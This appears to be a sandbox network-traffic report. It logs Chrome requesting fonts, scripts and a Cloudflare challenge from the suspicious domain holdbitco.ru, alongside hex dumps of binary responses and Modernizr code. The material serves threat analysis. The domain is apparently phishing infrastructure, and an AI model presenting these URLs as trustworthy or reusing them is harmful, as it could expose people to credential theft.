                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC780INData Raw: b6 4d b8 7b 63 f3 7f 37 df f7 fd da fa 17 f7 36 cc bb f7 c5 fa ba ef ef 23 81 fe 26 18 ee 85 40 23 77 72 d7 35 89 1a b3 44 58 49 17 b2 92 fb a8 fd 95 db ca 09 0e 84 cb 06 84 bf da 16 95 25 fc ed 0e a7 fa 61 50 6a 49 ea 9d f5 50 af 12 64 e0 1c e0 a9 28 7a 13 a2 bc 32 34 b6 24 44 6c 40 62 ec d0 8d b7 00 15 15 1c e3 1f 4f ee 63 34 03 a5 63 b2 e4 e8 8b e3 9a 10 68 87 ca 5f 63 f4 eb a6 ee 99 cd 99 7a 61 da 96 d7 d6 2e 7e 76 c0 7a fc 97 3f 4b 64 5e 0e bf fa f7 37 7e fc 48 c3 50 46 6d 7f ce a2 ab fb eb f3 16 3f d1 f9 d8 1f bf 7f a8 fc 4f 22 1f 65 03 fd ab 01 9f 0c a2 d3 92 a8 fd 85 c0 5a e4 55 dc 10 b9 7d 1b 5c a5 21 c4 41 67 39 e2 b4 f3 d2 be 75 24 79 e9 a2 4e 8b 89 8e 08 27 d1 26 3f 5f 77 8d 8a 47 19 38 43 d1 69 66 39 96 04 12 cf 62 96 19 5f 6d 74 38 51 49 4c
                                                                                                                                                                                                                                                                                                              Data Ascii: M{c76#&@#wr5DXI%aPjIPd(z24$Dl@bOc4ch_cza.~vz?Kd^7~HPFm?O"eZU}\!Ag9u$yN'&?_wG8Cif9b_mt8QIL
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC782INData Raw: 30 af 26 07 6b aa d5 aa 46 f1 8a 09 44 ef 11 50 10 71 23 b6 a2 03 22 a4 79 07 64 f0 1e f2 24 10 1f dd 12 4e 8f 8d 92 8d 75 2c 3c f3 0a 3c f3 2d fa cc 50 e2 7f d3 b4 09 d0 ee 64 a9 9c 5e 28 ae c6 1c cf 73 0d 24 c0 43 54 00 c7 cf d1 fa 62 14 a8 f7 0d d5 86 8e 5d 65 a0 71 ca 38 21 cf 77 fc cc ec 2d aa a9 2b 80 5f c6 44 30 11 02 a4 8f dc 5b 73 0b 0a e6 92 5f fb 93 97 84 b7 e5 0f 74 3c de 40 5f 70 35 dc c3 80 9b ea 1c 47 68 16 6b c2 d8 4a 8e 12 05 af 0b 17 6e c0 e5 c2 85 6d a0 d8 4a 37 08 17 70 f9 36 e1 d2 17 1b f0 5c dc b0 4d 38 85 eb 36 08 cf 0b cf 6d c3 75 94 ae f8 45 a0 fd 2f 69 be 5d 98 2d 98 74 8c 65 e6 cb 62 54 8b 2a e4 dc 02 82 b4 56 19 17 f2 cb 86 5f b2 ff fa 12 e5 0d 18 1b 7a 9f b9 ea 9c 1b c1 85 b2 24 71 7c 45 76 24 ae 2e 7b ea d6 30 9e d7 25 4c 67
                                                                                                                                                                                                                                                                                                              Data Ascii: 0&kFDPq#"yd$Nu,<<-Pd^(s$CTb]eq8!w-+_D0[s_t<@_p5GhkJnmJ7p6\M86muE/i]-tebT*V_z$q|Ev$.{0%Lg
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC783INData Raw: 9b 98 38 a3 d9 73 c6 fa 17 ba d6 df 78 a0 3a 39 a5 61 53 4d bc 47 74 61 86 75 c7 e1 de f3 c3 7b 9f 17 fe 70 63 f9 cf 53 1b b7 d5 66 b7 ce 88 b7 2d bc a7 70 6a 7b 51 a4 d8 b7 24 a1 92 5d 40 63 e2 aa 73 3e a4 6f 98 9e 14 6c 91 f2 63 cd fa 68 15 93 44 8e c6 3d 79 af f8 97 bd 32 d2 bb fc cc ea 82 1b eb 1f 64 1f 11 df 90 76 a6 0a 1d dc 21 7a 66 b2 ea 9c bb 64 eb 92 f5 23 7a 47 c8 54 66 d6 ff b7 bf 27 58 f4 ff 9a 33 7e fa fb 83 e9 f3 ef 75 ff ce 30 6b 31 ab 65 9d fd 6b fd d7 1a 32 d7 39 0b 18 4f cb c0 eb 62 81 6d 65 26 68 18 43 cf 1c 54 7e 13 c4 c2 13 74 f6 9f e1 19 96 1d 67 cf fe f6 60 d9 f1 db 03 a4 27 ec ff 1b e6 3d cc cf 81 b5 03 d0 4e 50 df 03 72 c5 0d e4 50 49 f8 61 93 a0 7e 81 53 6e ed e3 b3 41 cc 8a 41 b2 02 ec a2 bc 8e d2 f6 22 7d 25 4c ba 7f 9e 32 4b
                                                                                                                                                                                                                                                                                                              Data Ascii: 8sx:9aSMGtau{pcSf-pj{Q$]@cs>olchD=y2dv!zfd#zGTf'X3~u0k1ek29Obme&hCT~tg`'=NPrPIa~SnAA"}%L2K
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC784INData Raw: a9 d8 14 52 91 56 f4 d1 bf 5f 35 20 c5 77 60 09 ff 47 db 65 1f 2a d4 04 96 33 e7 bc 1c 45 8b 8e a2 d2 e9 42 f6 25 90 11 d6 a6 78 da 0d c2 7f 48 5a 79 00 00 f0 97 a9 33 df ef f7 9a 39 6d ce 9c 7b bf df 57 d3 a7 b5 ae cc 5e a6 ef 5a 89 8c 18 11 47 1c 11 71 48 44 44 0c 89 88 88 90 23 62 44 8c 08 89 38 22 86 c8 88 18 21 11 21 11 31 42 46 8c b8 3f 24 22 64 c4 fe 88 88 88 90 fd 11 71 c7 e7 03 41 90 0d 8a 42 13 ff db 84 1e ab e2 55 8b 55 7b 55 3f 74 c3 ba 45 dd 86 ae 54 6d ae 66 aa fb aa a7 aa bf eb 11 7d 4a 5f 30 58 0c 41 c3 b8 61 d9 70 64 a8 18 1d c6 6e e3 c7 27 89 27 db 26 93 69 d8 b4 51 63 aa e9 af c9 d6 5c 99 6d e6 5d d8 0c 77 c3 53 70 1a 5e 86 d7 e1 1c 9c 87 0f e1 13 b8 0c df 21 7a c4 82 70 48 0b d2 83 0c 22 e3 c8 02 b2 89 14 90 12 72 87 22 a8 03 f5 a2 2a
                                                                                                                                                                                                                                                                                                              Data Ascii: RV_5 w`Ge*3EB%xHZy39m{W^ZGqHDD#bD8"!!1BF?$"dqABUU{U?tETmf}J_0XAapdn''&iQc\m]wSp^!zpH"r"*
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC785INData Raw: 98 05 65 05 f7 2c 2c f8 37 98 6d f8 bc c4 14 22 95 81 d8 12 af 99 05 6d 8a 2f cc 16 e5 c4 37 66 9b 5c f1 83 39 45 9b d6 03 e6 39 0a ac 32 f3 3c 6d 58 6f 99 17 e8 c2 fa cc 9c a6 7b f6 2b 66 44 db 21 73 96 9e da 11 f3 12 f4 ef 98 97 c1 ef 99 73 e0 8f cc 2b b4 66 7f 62 5e a5 b4 cd 7d 62 a0 75 fb 2b b3 40 2d ee 19 f3 ae d9 3f 99 6d 5a 4f 65 aa e1 70 a2 bb ed 4e 2c 77 dd 7c 49 1e 4f 64 3d ac f9 41 30 91 8d 46 d5 91 95 5e 4f 1a 73 24 b5 8a 94 1e a9 c0 a9 d7 e4 61 47 e9 a1 2f f7 c3 5e d0 54 ed b3 9e af f3 8e eb e6 cb 5e c5 3b 28 d7 6b 53 f3 76 62 be e9 7c a4 74 d4 0d 07 72 ea dd 09 e3 93 70 30 4a 24 27 ef 96 ca 7d ff 54 85 71 4b 9d 2b b9 eb 14 9c 62 a1 50 2a de 9d cc 48 d2 1f 04 f2 2a bf af 95 8c b5 1f a8 be af 4f 23 19 b6 fe 3e 89 e7 f7 bb da f7 c2 01 94 b2 13
                                                                                                                                                                                                                                                                                                              Data Ascii: e,,7m"m/7f\9E92<mXo{+fD!ss+fb^}bu+@-?mZOepN,w|IOd=A0F^Os$aG/^T^;(kSvb|trp0J$'}TqK+bP*H*O#>
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC787INData Raw: 82 de ca d6 73 79 27 10 b3 72 96 a9 8d 07 52 12 3b 24 a6 05 2a c9 8c 6d a9 4e e5 a2 11 d5 ae 48 99 b9 ca 7e 77 31 a7 a3 33 50 34 f5 fa 48 5b 44 62 54 60 a2 45 62 ab c4 98 c4 78 30 66 eb 66 4e cd 14 1d 4d 89 65 54 db 32 95 d8 88 ad 2d d5 02 b1 09 d5 4d 61 96 2e 46 52 b1 98 c4 46 89 29 81 f1 7a 89 33 fb cd 81 58 ca 8b 16 4a 64 74 3b 53 9c 18 35 b4 65 c1 44 d6 72 d4 4c 46 33 1d 97 b7 97 24 25 c1 cb a5 a4 1c dd c8 6a c1 d4 ec b5 40 ca 9f 3d 21 a3 27 66 b2 a5 42 ed be e8 ed b3 6e e1 f6 8c 35 31 a1 0a 23 b4 a8 7c 47 e9 10 f9 3a 44 be 0e 2f 5f a0 43 26 e9 ac 13 94 3b cb 0e e1 c5 be 48 4a 97 68 50 97 17 a4 b2 cb cd 17 ee f2 9f 77 8b f3 6e ef 3c d8 5d e6 d3 ed bb 55 db 93 2f ba ad b6 8b 13 86 5a 74 94 1e c1 a8 47 74 bb c7 5f 6f 32 2a 51 d6 9b 6c 0e f5 14 0c b5 90
                                                                                                                                                                                                                                                                                                              Data Ascii: sy'rR;$*mNH~w13P4H[DbT`Ebx0ffNMeT2-Ma.FRF)z3XJdt;S5eDrLF3$%j@=!'fBn51#|G:D/_C&;HJhPwn<]U/ZtGt_o2*Ql
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC788INData Raw: b0 9a c1 ca a2 39 5c 33 9f 84 44 20 02 5d e8 a5 59 27 10 51 20 68 16 41 b3 68 5e b5 f7 bc 38 d7 6b f8 2b 34 73 28 9f 58 f4 86 6a 6f 7b ed dd 74 d3 30 b1 bf 90 ec 9f 55 b1 36 e7 ec 7b f1 dc 1c 12 18 da 34 57 e1 9a 45 25 db f1 19 7e cc e0 41 fa 32 32 91 2d 75 bc 98 83 07 6f ed 08 f9 65 b5 65 53 e2 b5 21 36 d2 73 7e 05 ad c0 3b 3e 3c 69 c1 fe 16 76 5f 4e d5 29 09 8c 35 6d 41 22 5a 0e 69 9b 7d 5d d7 93 5c 2d 28 2d d6 32 ee 9e 47 73 d2 16 2e 4d a3 f8 a6 a0 38 b0 45 00 f5 7f cd cf eb da ac 66 db 51 10 9f 2d 54 e8 71 c5 b8 80 30 2d c2 b7 85 8a 45 4b 2a d6 59 2e 23 ce 2c cf a9 38 cb f2 4d 15 e7 58 be a5 e2 3c cb f3 2a 2e b0 34 54 3c c1 f2 6d 15 17 59 be a3 e2 49 96 1f 28 39 8c 3b 15 02 44 58 8a 2a e9 0f b8 41 2c 2a 8f 1d 2e 8f 0e 1f a6 87 95 b1 c3 d5 d1 e1 a3 f4
                                                                                                                                                                                                                                                                                                              Data Ascii: 9\3D ]Y'Q hAh^8k+4s(Xjo{t0U6{4WE%~A22-uoeeS!6s~;><iv_N)5mA"Zi}]\-(-2Gs.M8EfQ-Tq0-EK*Y.#,8MX<*.4T<mYI(9;DX*A,*.
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC789INData Raw: 4c df da 9d d0 6d 6a d1 eb 22 dc ec 9f 1d 5d f0 30 1a 3f c1 67 0d 0b 97 21 51 0d cb e5 2c 82 17 63 a0 95 3d 08 7b 96 2d 53 74 39 f0 6a 48 12 04 89 4b 94 af 9b 23 17 19 74 cf 39 6c de 13 d0 d2 b9 04 28 0c 27 8c 07 b7 fa 5f 9e 8b 04 49 7c fe 60 3f 78 23 cf 0e
                                                                                                                                                                                                                                                                                                              Data Ascii: Lmj"]0?g!Q,c={-St9jHK#t9l('_I|`?x#


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              65192.168.2.1649800104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC790OUTGET /web5/assets/fonts/GDSherpa-regular.woff HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              66192.168.2.1649801104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC790OUTGET /web5/assets/fonts/GDSherpa-vf.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              67192.168.2.1649802104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC791OUTGET /web5/assets/fonts/GDSherpa-vf2.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              68192.168.2.1649803104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC791OUTPOST /cdn-cgi/challenge-platform/h/g/jsd/r/81bbd3f11f9128a6 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 15827
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC792OUTData Raw: 7b 22 77 70 22 3a 22 36 7a 57 44 6c 42 2b 73 6c 34 57 6c 65 31 52 2b 6b 2b 66 75 6d 44 42 39 75 67 55 75 38 41 38 4b 4b 42 73 2b 70 4f 75 59 71 39 47 71 53 57 75 78 59 43 48 52 71 34 2b 6e 75 65 6b 57 64 61 7a 7a 75 67 54 4b 75 76 75 4b 39 4b 57 2b 75 4d 4b 2b 56 52 30 44 54 34 7a 6f 77 2d 44 59 71 35 7a 55 67 51 6e 66 31 64 79 44 56 35 6c 5a 55 58 2b 51 4f 59 54 38 75 6c 57 57 6a 38 78 42 6f 61 75 4a 64 61 53 24 6f 75 24 44 31 78 75 42 5a 57 75 38 44 42 42 44 35 65 44 38 75 2b 71 75 6d 34 74 75 2b 58 6f 75 46 49 73 67 64 7a 43 2b 67 54 61 57 75 42 49 6f 75 42 52 48 6d 75 48 42 75 2b 6f 4d 53 63 57 2d 6e 55 39 42 64 42 2b 24 56 55 7a 4f 6c 35 68 4c 24 59 75 41 44 42 38 62 4e 7a 75 73 74 7a 71 31 53 59 72 4d 64 75 48 4c 24 54 35 41 67 44 75 63 54 41 53 38
                                                                                                                                                                                                                                                                                                              Data Ascii: {"wp":"6zWDlB+sl4Wle1R+k+fumDB9ugUu8A8KKBs+pOuYq9GqSWuxYCHRq4+nuekWdazzugTKuvuK9KW+uMK+VR0DT4zow-DYq5zUgQnf1dyDV5lZUX+QOYT8ulWWj8xBoauJdaS$ou$D1xuBZWu8DBBD5eD8u+qum4tu+XouFIsgdzC+gTaWuBIouBRHmuHBu+oMScW-nU9BdB+$VUzOl5hL$YuADB8bNzustzq1SYrMduHL$T5AgDucTAS8


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              69192.168.2.1649804104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC807OUTGET /web5/assets/js/pages-head-web.min.js?cb=1698251258165 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              7104.17.25.14443192.168.2.1649734C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC39INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:17 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                                                              ETag: W/"5eb03f26-2b4c"
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 04 May 2020 16:13:26 GMT
                                                                                                                                                                                                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                              Age: 154414
                                                                                                                                                                                                                                                                                                              Expires: Mon, 14 Oct 2024 16:27:17 GMT
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gNYVLacJy7tn0kqJjwv7LF2Hlq3oWFz32kVTtcdpX7LpgXzouS4R361qqige29GVFnxZID3cer2CfGZcaMh%2BKwaymsW4aTXUh%2BHAG8f5spRGA9IvAvfcGefxXPhbmZppdF0pBw%2BR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd37a49138302-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC40INData Raw: 32 62 34 63 0d 0a 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 62 2e 63 73 73 54 65 78 74 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 72 28 53 2e 6a 6f 69 6e 28 65 2b 22 3b 22 29 2b 28 74 7c 7c 22 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 7e 28 22 22 2b 65 29 2e 69 6e 64 65 78 4f 66 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 65 29 7b 76 61 72 20 6f 3d 65 5b 72 5d 3b 69 66 28 21 69 28 6f 2c 22 2d 22 29 26 26 62 5b 6f 5d 21 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: 2b4cwindow.Modernizr=function(e,t,n){function r(e){b.cssText=e}function o(e,t){return r(S.join(e+";")+(t||""))}function a(e,t){return typeof e===t}function i(e,t){return!!~(""+e).indexOf(t)}function c(e,t){for(var r in e){var o=e[r];if(!i(o,"-")&&b[o]!=
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC40INData Raw: 20 75 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 65 2e 73 6c 69 63 65 28 31 29 2c 6f 3d 28 65 2b 22 20 22 2b 6b 2e 6a 6f 69 6e 28 72 2b 22 20 22 29 2b 72 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 22 73 74 72 69 6e 67 22 29 7c 7c 61 28 74 2c 22 75 6e 64 65 66 69 6e 65 64 22 29 3f 63 28 6f 2c 74 29 3a 28 6f 3d 28 65 2b 22 20 22 2b 54 2e 6a 6f 69 6e 28 72 2b 22 20 22 29 2b 72 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 73 28 6f 2c 74 2c 6e 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 70 2e 69 6e 70 75 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 2c 6f 3d 6e 2e 6c 65 6e 67 74 68 3b 6f 3e 72 3b 72 2b 2b 29 6a 5b 6e 5b 72 5d 5d
                                                                                                                                                                                                                                                                                                              Data Ascii: u(e,t,n){var r=e.charAt(0).toUpperCase()+e.slice(1),o=(e+" "+k.join(r+" ")+r).split(" ");return a(t,"string")||a(t,"undefined")?c(o,t):(o=(e+" "+T.join(r+" ")+r).split(" "),s(o,t,n))}function l(){p.input=function(n){for(var r=0,o=n.length;o>r;r++)j[n[r]]
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC42INData Raw: 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 61 2c 69 2c 63 2c 73 2c 75 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 6c 3d 74 2e 62 6f 64 79 2c 64 3d 6c 7c 7c 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 64 79 22 29 3b 69 66 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 29 66 6f 72 28 3b 72 2d 2d 3b 29 63 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 63 2e 69 64 3d 6f 3f 6f 5b 72 5d 3a 76 2b 28 72 2b 31 29 2c 75 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 72 65 74 75 72 6e 20 61 3d 5b 22 26 23 31 37 33 3b 22 2c 27 3c 73 74 79 6c 65 20 69 64 3d 22 73 27 2c 76 2c 27 22 3e 27 2c 65 2c 22 3c 2f 73 74 79 6c 65 3e 22 5d 2e 6a 6f 69 6e 28 22 22 29 2c 75 2e 69 64 3d 76 2c 28 6c 3f 75
                                                                                                                                                                                                                                                                                                              Data Ascii: ction(e,n,r,o){var a,i,c,s,u=t.createElement("div"),l=t.body,d=l||t.createElement("body");if(parseInt(r,10))for(;r--;)c=t.createElement("div"),c.id=o?o[r]:v+(r+1),u.appendChild(c);return a=["&#173;",'<style id="s',v,'">',e,"</style>"].join(""),u.id=v,(l?u
